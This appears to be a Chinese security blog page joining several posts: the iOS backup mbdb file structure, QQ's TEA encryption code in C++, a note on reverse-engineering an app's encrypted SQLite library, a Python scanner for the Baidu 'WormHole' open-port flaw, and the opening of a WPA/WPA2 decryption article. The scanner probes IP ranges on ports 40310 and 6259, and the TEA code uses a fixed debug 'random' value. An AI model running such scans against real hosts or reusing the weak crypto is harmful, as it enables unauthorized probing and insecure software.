IOS通过备份,得到的目录里面是一片乱码(严格来说是sha1编码)。解析出具体的文件列表的分析有很多了,整理了一下,写出来。
大概介绍下,这个文件的开头是“mbdb”,前六个字节一般是固定的“mbdb\05\00”,然后就是一个个结构体。结构体大概是这样子的:
struct fileinfo{
char *domain;
char *filename;
char *linktarget;
char *datahash;
char *unknown1;
unsigned short mode;
unsigned int unknown2;
unsigned int inode;
unsigned int userid;
unsigned int groupid;
unsigned int mtime;
unsigned int atime;
unsigned int ctime;
unsigned long long filelen;
unsigned int flag;
unsigned int numprops;
};domain就是包名,每个应用都不同。filename就是path。datahash发现现在都是空的了,无用。最后就是那个numprops是附加数据,这个必须处理。flag为0是文件夹或者link,也可以通过filelen来判断是否为文件。
Tea算法被某公司应用的酣畅淋漓,最近用到了,在测试了多分代码后,推荐此代码。保留原作者信息。
cpypt.cpp
/**
* The QQ2003C protocol plugin
*
* for gaim
*
* Copyright © 2004 Puzzlebird
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
**************************************************
* Reorganized by Minmin <csdengxm@hotmail.com>, 2005-3-27
**************************************************
*/
#include "stdafx.h"
#include "crypt.h"
#include <string.h>
#ifdef _WIN32
#include <winsock.h>
#else
#include <arpa/inet.h>
#endif
#include <cstring>
Crypt::Crypt()
{
}
Crypt::~Crypt()
{
}
void Crypt::teaEncipher(unsigned int *const v, const unsigned int *const k,
unsigned int *const w)
{
register unsigned int
y = ntohl(v[0]),
z = ntohl(v[1]),
a = ntohl(k[0]),
b = ntohl(k[1]),
c = ntohl(k[2]),
d = ntohl(k[3]),
n = 0x10, /* do encrypt 16 (0x10) times */
sum = 0,
delta = 0x9E3779B9; /* 0x9E3779B9 - 0x100000000 = -0x61C88647 */
while (n-- > 0) {
sum += delta;
y += ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
z += ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
}
w[0] = htonl(y); w[1] = htonl(z);
}
void Crypt::teaDecipher(unsigned int *const v, const unsigned int *const k,
unsigned int *const w)
{
register unsigned int
y = ntohl(v[0]),
z = ntohl(v[1]),
a = ntohl(k[0]),
b = ntohl(k[1]),
c = ntohl(k[2]),
d = ntohl(k[3]),
n = 0x10,
sum = 0xE3779B90,
/* why this ? must be related with n value*/
delta = 0x9E3779B9;
void *p = &a;
/* sum = delta<<5, in general sum = delta * n */
while (n-- > 0) {
z -= ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
y -= ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
sum -= delta;
}
w[0] = htonl(y);
w[1] = htonl(z);
}
void Crypt::encrypt( unsigned char* instr, int32 instrlen, unsigned char* key,
unsigned char* outstr, int32* outstrlen_ptr)
{
unsigned char
plain[8], /* plain text buffer*/
plain_pre_8[8], /* plain text buffer, previous 8 bytes*/
* crypted, /* crypted text*/
* crypted_pre_8, /* crypted test, previous 8 bytes*/
* inp; /* current position in instr*/
int
pos_in_byte = 1, /* loop in the byte */
is_header=1, /* header is one byte*/
count=0, /* number of bytes being crypted*/
padding = 0; /* number of padding stuff*/
//void encrypt_every_8_byte (void);
/*** we encrypt every eight byte ***/
#define encrypt_every_8_byte() \
{\
for(pos_in_byte=0; pos_in_byte<8; pos_in_byte++) {\
if(is_header) { plain[pos_in_byte] ^= plain_pre_8[pos_in_byte]; }\
else { plain[pos_in_byte] ^= crypted_pre_8[pos_in_byte]; }\
} /* prepare plain text*/\
teaEncipher( (unsigned int *) plain,\
(unsigned int *) key, \
(unsigned int *) crypted); /* encrypt it*/\
\
for(pos_in_byte=0; pos_in_byte<8; pos_in_byte++) {\
crypted[pos_in_byte] ^= plain_pre_8[pos_in_byte]; \
} \
memcpy(plain_pre_8, plain, 8); /* prepare next*/\
\
crypted_pre_8 = crypted; /* store position of previous 8 byte*/\
crypted += 8; /* prepare next output*/\
count += 8; /* outstrlen increase by 8*/\
pos_in_byte = 0; /* back to start*/\
is_header = 0; /* and exit header*/\
}/* encrypt_every_8_byte*/
pos_in_byte = (instrlen + 0x0a) % 8; /* header padding decided by instrlen*/
if (pos_in_byte) {
pos_in_byte = 8 - pos_in_byte;
}
plain[0] = (rand() & 0xf8) | pos_in_byte;
memset(plain+1, rand()&0xff, pos_in_byte++);
memset(plain_pre_8, 0x00, sizeof(plain_pre_8));
crypted = crypted_pre_8 = outstr;
padding = 1; /* pad some stuff in header*/
while (padding <= 2) { /* at most two byte */
if(pos_in_byte < 8) { plain[pos_in_byte++] = rand() & 0xff; padding ++; }
if(pos_in_byte == 8){ encrypt_every_8_byte(); }
}
inp = instr;
while (instrlen > 0) {
if (pos_in_byte < 8) { plain[pos_in_byte++] = *(inp++); instrlen --; }
if (pos_in_byte == 8){ encrypt_every_8_byte(); }
}
padding = 1; /* pad some stuff in tailer*/
while (padding <= 7) { /* at most sever byte*/
if (pos_in_byte < 8) { plain[pos_in_byte++] = 0x00; padding ++; }
if (pos_in_byte == 8){ encrypt_every_8_byte(); }
}
*outstrlen_ptr = count;
}
int Crypt::rand(void)
{
/* it can be the real random seed function*/
return 0xdead; /* override with number, convenient for debug*/
}
int Crypt::decrypt( unsigned char* instr, int32 instrlen, unsigned char* key,
unsigned char* outstr, int32* outstrlen_ptr)
{
unsigned char
decrypted[8], m[8],
* crypt_buff,
* crypt_buff_pre_8,
* outp;
int
count,
context_start,
pos_in_byte,
padding;
#define decrypt_every_8_byte() {\
bool bNeedRet = false;\
for (pos_in_byte = 0; pos_in_byte < 8; pos_in_byte ++ ) {\
if (context_start + pos_in_byte >= instrlen) \
{\
bNeedRet = true;\
break;\
}\
decrypted[pos_in_byte] ^= crypt_buff[pos_in_byte];\
}\
if( !bNeedRet ) { \
teaDecipher( (unsigned int *) decrypted, \
(unsigned int *) key, \
(unsigned int *) decrypted);\
\
context_start += 8;\
crypt_buff += 8;\
pos_in_byte = 0;\
}\
}/* decrypt_every_8_byte*/
/* at least 16 bytes and %8 == 0*/
if ((instrlen % 8) || (instrlen < 16)) return 0;
/* get information from header*/
teaDecipher( (unsigned int *) instr,
(unsigned int *) key,
(unsigned int *) decrypted);
pos_in_byte = decrypted[0] & 0x7;
count = instrlen - pos_in_byte - 10; /* this is the plaintext length*/
/* return if outstr buffer is not large enought or error plaintext length*/
if (*outstrlen_ptr < count || count < 0) return 0;
memset(m, 0, 8);
crypt_buff_pre_8 = m;
*outstrlen_ptr = count; /* everything is ok! set return string length*/
crypt_buff = instr + 8; /* address of real data start */
context_start = 8; /* context is at the second 8 byte*/
pos_in_byte ++; /* start of paddng stuffv*/
padding = 1; /* at least one in header*/
while (padding <= 2) { /* there are 2 byte padding stuff in header*/
if (pos_in_byte < 8) { /* bypass the padding stuff, none sense data*/
pos_in_byte ++; padding ++;
}
if (pos_in_byte == 8) {
crypt_buff_pre_8 = instr;
//if (! decrypt_every_8_byte()) return 0;
decrypt_every_8_byte();
}
}/* while*/
outp = outstr;
while(count !=0) {
if (pos_in_byte < 8) {
*outp = crypt_buff_pre_8[pos_in_byte] ^ decrypted[pos_in_byte];
outp ++;
count --;
pos_in_byte ++;
}
if (pos_in_byte == 8) {
crypt_buff_pre_8 = crypt_buff - 8;
//if (! decrypt_every_8_byte()) return 0;
decrypt_every_8_byte();
}
}/* while*/
for (padding = 1; padding < 8; padding ++) {
if (pos_in_byte < 8) {
if (crypt_buff_pre_8[pos_in_byte] ^ decrypted[pos_in_byte]) return 0;
pos_in_byte ++;
}
if (pos_in_byte == 8 ) {
crypt_buff_pre_8 = crypt_buff;
//if (! decrypt_every_8_byte()) return 0;
decrypt_every_8_byte();
}
}/* for*/
return 1;
}
int Crypt::qq_crypt ( unsigned char flag, unsigned char* instr, int32 instrlen,
unsigned char* key, unsigned char* outstr, int32* outstrlen_ptr)
{
if (flag == DECRYPT)
return decrypt(instr, instrlen, key, outstr, outstrlen_ptr);
else
if (flag == ENCRYPT)
encrypt(instr, instrlen, key, outstr, outstrlen_ptr);
return 1; /* flag must be DECRYPT or ENCRYPT*/
}/* qq_crypt*/逆向分析某app的本地存储是发现其平台下所有APP都是利用了同一个基于sqlite的加密库,网上没有搜索到任何有用信息,猜测是自己定制的(文件名:libdatabase_sqlcrypto.so,内部名是alibaba.sqlcrypto)。
ps:如果有人觉得此文不妥,立即联系博主处理(我发现了一些事情,表示你们响应速度还蛮快的)。
WormHole的检测代码,随手python写的。
#exploit write by fenlog,baidu wormhole POC.
#QQ:345382462
import urllib2, urllib
import sys
headers = {
"Accept": "*/*",
"Host": "127.0.0.1",
"remote-addr": "127.0.0.1",
"Referer": "http://www.baidu.com/"
}
def ip2num(ip):
ip = [int(x) for x in ip.split('.')]
return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]
def num2ip(num):
return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)
def URLRequest(url):
try:
request = urllib2.Request(url = url,headers = headers)
response = urllib2.urlopen(request)
return response.read()
except:
return ""
if len(sys.argv) == 3:
ipstart = ip2num(sys.argv[1])
ipend = ip2num(sys.argv[2])
elif (len(sys.argv) == 2):
ipstart = ip2num(sys.argv[1])
ipend = ipstart
else:
print "Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (sys.argv[0], sys.argv[0])
exit(0)
if (ipstart > ipend):
print "Target IP Err"
exit(0)
urllib2.socket.setdefaulttimeout(3)
for targetip in range(ipstart, ipend + 1):
strip = num2ip(targetip)
print "Scan %s..." % (strip)
url1 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 40310)
url2 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 6259)
ret = URLRequest(url1)
if (len(ret) == 0):
ret = URLRequest(url2)
if (len(ret) > 0):
print "Found %s:%s" % (strip, ret)
print "Scan %d IPs Finish!" % (ipend - ipstart + 1)无线网络越来越普及,从此涉及到的业务也出现了多个。从安全圈子来讲,破解、劫持、嗅探等等都开始玩的不亦乐乎。本篇文章详细说明有了数据包如何还原WPA/WPA2加密的密文数据。此文章仅代表博主对WPA/WPA2加密解密的理解,用于学习流程,也为共同研究的同学提供关键字查询更多资料,如有错误请多包涵。
关键字:WAP,WPA2,解密,EAPOL,WPADecrypt。
开放wifi就不提了,直接通过嗅探可以看到所有数据。